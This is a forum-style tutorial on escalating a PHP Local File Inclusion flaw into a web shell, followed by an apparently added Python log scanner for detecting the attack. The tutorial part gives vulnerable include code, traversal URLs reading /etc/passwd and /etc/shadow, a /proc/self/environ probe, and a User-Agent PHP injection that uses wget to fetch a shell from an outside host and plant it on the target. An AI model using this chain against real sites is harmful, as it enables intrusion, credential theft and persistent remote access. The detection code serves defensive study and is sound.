Assalam-O-Alaikum,
Have you ever uploaded a shell through an LFI vulnerability? Many of you have done it the hard way; let's see how this method makes it simple for you.
This topic is linked with my previous topic on LFI vulnerabilities, so if you don't know what I am talking about, reading this trick is useless; first read LFI Vulnerabilities. So let's start. I have divided this into 4 parts to make it simple.
- Introduction
- /proc/self/environ
- PHP injection
- Accessing the shell
1. Introduction
Remember the LFI vulnerability? I am sure you do. This is a tutorial on how to get a shell on a website that is vulnerable to LFI.
Here is an example of code that is vulnerable to LFI:
<?php
// LFI Vulnerable Code
// The "redirect" query parameter is taken from the request without any validation
$redirect = $_GET['redirect'];
include($redirect);
?>
It is vulnerable because $redirect is not sanitized; therefore include($redirect); will include whatever path is passed in $_GET['redirect'].
Here is an example of LFI on Unix (very old):
http://www.example.com/redirect.php?.../../etc/passwd (Unix)
http://www.example.com/redirect.php?.../../etc/shadow (Linux)
http://www.example.com/redirect.php?.../master.passwd (FreeBSD)
2. /proc/self/environ
To check if it is vulnerable, we enter this in the ../ part:
../../../../../proc/self/environ
If you get something like
DOCUMENT_ROOT=SKDOISAJUF()&@#%(#*%, etc... (That means it is vulnerable.)
If you get only a blank page, it isn't vulnerable.
3. PHP Injection
Now, let's access it and use Tamper Data to change the user agent to this:
<?system('wget http://gonullyourself.org/shell.txt -O gonullyourself.php');?>
Now, submit the request.
Our command will be executed.
4. Accessing the shell
To check if the command got executed, we will enter something like this:
http://www.google.ca/gonullyourself.php
If our shell is there, the command was successfully executed. Easy nuh :p
Special thanks to rGod at insecurity.ro
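From the defender's side, the request described in parts 2 and 3 leaves a recognizable trace in the web server's access log: a request target that resolves to /proc/self/environ and a PHP opening tag inside a request header. The following is an added example, not code from the original post; it assumes the Apache/nginx "combined" log format, and the finding names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache/nginx "combined" access-log format (assumed log layout).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>.*)"$'
)
ENVIRON_RE = re.compile(r"/proc/self/environ", re.I)
PHP_TAG_RE = re.compile(r"<\?")  # an opening PHP tag never belongs in a header

def normalize(target, rounds=3):
    """Percent-decode repeatedly so single- and double-encoded paths compare equal."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    # Treat backslashes as slashes and collapse runs such as "..//proc//self".
    return re.sub(r"/+", "/", target.replace("\\", "/"))

def inspect(line):
    """Return the findings for one log line (empty list if clean or unparsable)."""
    m = LOG_RE.match(line.strip())
    if not m:
        return []
    findings = []
    if ENVIRON_RE.search(normalize(m["target"])):
        findings.append("environ-include")
    if PHP_TAG_RE.search(m["agent"]) or PHP_TAG_RE.search(m["referer"]):
        findings.append("php-tag-in-header")
    return findings

def scan(lines):
    """Return (client_ip, findings) for every line with at least one finding."""
    hits = [(line.split(" ", 1)[0], inspect(line)) for line in lines]
    return [(ip, found) for ip, found in hits if found]

# Constructed sample lines (documentation IP ranges, placeholder header value).
SAMPLE_LOG = [
    '198.51.100.4 - - [10/Oct/2023:13:55:36 +0000] "GET /redirect.php?redirect=about.php HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.8 - - [10/Oct/2023:13:56:10 +0000] "GET /redirect.php?redirect=%2e%2e%2f%2e%2e%2fproc%2fself%2fenviron HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [10/Oct/2023:13:57:02 +0000] "GET /redirect.php?redirect=%252e%252e%252fproc%252fself%252fenviron HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.7 - - [10/Oct/2023:13:58:40 +0000] "GET /redirect.php?redirect=../../../../../proc/self/environ HTTP/1.1" 200 812 "-" "<?php /* constructed placeholder */ ?>"',
]

if __name__ == "__main__":
    for ip, findings in scan(SAMPLE_LOG):
        print(ip, ",".join(findings))
```

A line that carries both findings matches the full sequence from parts 2 and 3 and deserves the highest priority; a 200 response with a non-trivial body size on such a line suggests the include actually succeeded.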
Regards,
Zulqurnain jutt